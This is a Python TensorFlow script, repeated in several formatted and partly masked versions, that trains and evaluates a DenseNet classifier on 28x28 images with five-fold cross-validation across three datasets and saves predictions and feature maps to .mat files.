else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(
1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(
1, number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([
wrong_prediction_printop,
predicted_labels_printop,
prediction_prob_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess
.run([b1_conv_printop, b2_conv_printop,
b3_conv_printop, t1_conv_printop,
t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image,
y_: t_label, keep_prob: 1.0, training: False}))
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1, wrong,
axis=0)
predicted_list_1 = np.append(predicted_list_1,
predicted, axis=0)
prediction_prob_1 = np.append(prediction_prob_1,
prediction_prob)
Accuracy = Accuracy / num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil(itrt_index * batch_size /
total_trainImages)
sio.savemat('D' + Dataset + '_' + file_name + '_' + str
(epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list':
wrong_list_1, 'predicted_list': predicted_list_1,
'Target_labels': Target_labels, 'prediction_prob':
prediction_prob, 'b1_list': b1_list, 'b2_list':
b2_list, 'b3_list': b3_list, 't1_list': t1_list,
't2_list': t2_list, 't3_list': t3_list, 't1_b_list':
t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':
t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'
% (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = itrt_index * batch_size / total_trainImages
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1], keep_prob: 1.0, training: False})
print('step %d, training accuracy %g' % (i, train_accuracy)
)
_, loss = sess.run([train_step, cross_entropy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: dropout_prob,
training: True})
iteration_cost = 0
num_minibatches = int(total_trainImages / batch_size)
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print('Loss: ', loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)
t_label = np.array(Test_Labels[img_index, :]).reshape(1,
number_of_classes)
test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,
keep_prob: 1.0, training: False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop,
predicted_labels_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([
b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop, t2_conv_printop, t3_conv_printop,
t1_b_conv_printop, t2_b_conv_printop,
t3_b_conv_printop], feed_dict={x: t_image, y_:
t_label, keep_prob: 1.0, training: False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list, b1, axis=0)
b2_list = np.append(b2_list, b2, axis=0)
b3_list = np.append(b3_list, b3, axis=0)
t1_list = np.append(t1_list, t1, axis=0)
t2_list = np.append(t2_list, t2, axis=0)
t3_list = np.append(t3_list, t3, axis=0)
t1_b_list = np.append(t1_b_list, t1_b, axis=0)
t2_b_list = np.append(t2_b_list, t2_b, axis=0)
t3_b_list = np.append(t3_b_list, t3_b, axis=0)
if img_index == 0:
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list, wrong, axis=0)
predicted_list = np.append(predicted_list, predicted,
axis=0)
Accuracy = Accuracy / num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print(
'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %
(batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil(iteration * batch_size / total_trainImages
)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title('Learning rate =' + str(learn_rate))
plt.show()
sio.savemat('D' + Dataset + '_' + file_name + '_' + str(
epoch_around) + 'ep_' + data_type +
'_predicted_labels_list.mat', {'wrong_list': wrong_list,
'predicted_list': predicted_list, 'Target_labels':
Target_labels, 'accuracy_list': accuracy_list,
'list_of_predicted_list': list_of_predicted_list, 'costs':
costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':
b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':
t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,
't3_b_list': t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
densenet('1', 'org', 1, model)
densenet('1', 'org', 2, model)
densenet('1', 'org', 3, model)
densenet('1', 'org', 4, model)
densenet('1', 'org', 5, model)
densenet('1', 'aug', 1, model)
densenet('1', 'aug', 2, model)
densenet('1', 'aug', 3, model)
densenet('1', 'aug', 4, model)
densenet('1', 'aug', 5, model)
densenet('2', 'org', 1, model)
densenet('2', 'org', 2, model)
densenet('2', 'org', 3, model)
densenet('2', 'org', 4, model)
densenet('2', 'org', 5, model)
densenet('2', 'aug', 1, model)
densenet('2', 'aug', 2, model)
densenet('2', 'aug', 3, model)
densenet('2', 'aug', 4, model)
densenet('2', 'aug', 5, model)
densenet('3', 'org', 1, model)
densenet('3', 'org', 2, model)
densenet('3', 'org', 3, model)
densenet('3', 'org', 4, model)
densenet('3', 'org', 5, model)
densenet('3', 'aug', 1, model)
densenet('3', 'aug', 2, model)
densenet('3', 'aug', 3, model)
densenet('3', 'aug', 4, model)
densenet('3', 'aug', 5, model)
<|reserved_special_token_1|>
def densenet(D,DT,F,model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
###############
# load training / testing set from CrossVal folder,
# names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'
# name for testing set, 'D1_1st_fold_test.mat'
###############
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D'+Dataset)
print("path " ,path)
if data_type == 'original':
Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))
else:
Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i !=num_of_test:
list_to_display.append(int(iteration_to_display*(i+1)))
del i
total_fm_Block_1 = fm1+(num_layers*k_fm)
total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)
total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)
fc_nodes = [total_fm_Block_3 ]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0,2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0,2])
Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels,axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape,n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial,name=n)
def bias_variable(shape,n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial,name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name="W", with_bias=False):
W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)
conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')
if with_bias:
return conv + bias_variable([ out_features ])
return conv
def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True, training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features, kernel_size, name="W"+str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training, keep_prob, name="Block_"):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name="W1", with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name="Block_1")
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_2")
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_2"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_3")
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_3"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope("Dense_Last_lyr"):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes],"w_fc3")
b_fc3 = bias_variable([number_of_classes],"b_fc3")
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])
with tf.name_scope("Xent"):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope("train"):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end-batch_size)
images = Train_Images[(index_end-batch_size):total_trainImages, :]
labels = Train_Labels[(index_end-batch_size):total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:index_end, :]))
labels = np.vstack((labels, Train_Labels[index:index_end, :]))
batch = (images, labels)
index = index_end
index_end = index + batch_size
else:
batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' % elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration,i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop,
predicted_labels_printop,prediction_prob_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)
predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)
prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)
Accuracy = Accuracy/num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels,
'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = (itrt_index * batch_size) / total_trainImages
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1],
keep_prob: 1.0, training:False})
print('step %d, training accuracy %g' % (i, train_accuracy))
_, loss = sess.run([train_step, cross_entropy],
feed_dict={x: batch[0], y_: batch[1],
keep_prob: dropout_prob, training:True})
iteration_cost = 0 # Defines a cost related to an epoch
num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size minibatch_size in the train set
iteration_cost += loss / num_minibatches
costs.append(iteration_cost)
if i % 100 == 0:
print ('Loss: ',loss)
Accuracy = 0
training_time = time.time() - start_time
print('Training Time: %f secs' % training_time)
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list,wrong,axis=0)
predicted_list = np.append(predicted_list,predicted,axis=0)
Accuracy = Accuracy/num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil((iteration * batch_size) / total_trainImages)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
densenet('1','org',1,model)
densenet('1','org',2,model)
densenet('1','org',3,model)
densenet('1','org',4,model)
densenet('1','org',5,model)
densenet('1','aug',1,model)
densenet('1','aug',2,model)
densenet('1','aug',3,model)
densenet('1','aug',4,model)
densenet('1','aug',5,model)
densenet('2','org',1,model)
densenet('2','org',2,model)
densenet('2','org',3,model)
densenet('2','org',4,model)
densenet('2','org',5,model)
densenet('2','aug',1,model)
densenet('2','aug',2,model)
densenet('2','aug',3,model)
densenet('2','aug',4,model)
densenet('2','aug',5,model)
densenet('3','org',1,model)
densenet('3','org',2,model)
densenet('3','org',3,model)
densenet('3','org',4,model)
densenet('3','org',5,model)
densenet('3','aug',1,model)
densenet('3','aug',2,model)
densenet('3','aug',3,model)
densenet('3','aug',4,model)
densenet('3','aug',5,model)
|
flexible
|
{
"blob_id": "48270f70a9d69d15f808f22ec2d11d337b2c4845",
"index": 7414,
"step-1": "<mask token>\n\n\nclass MyModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-3": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += 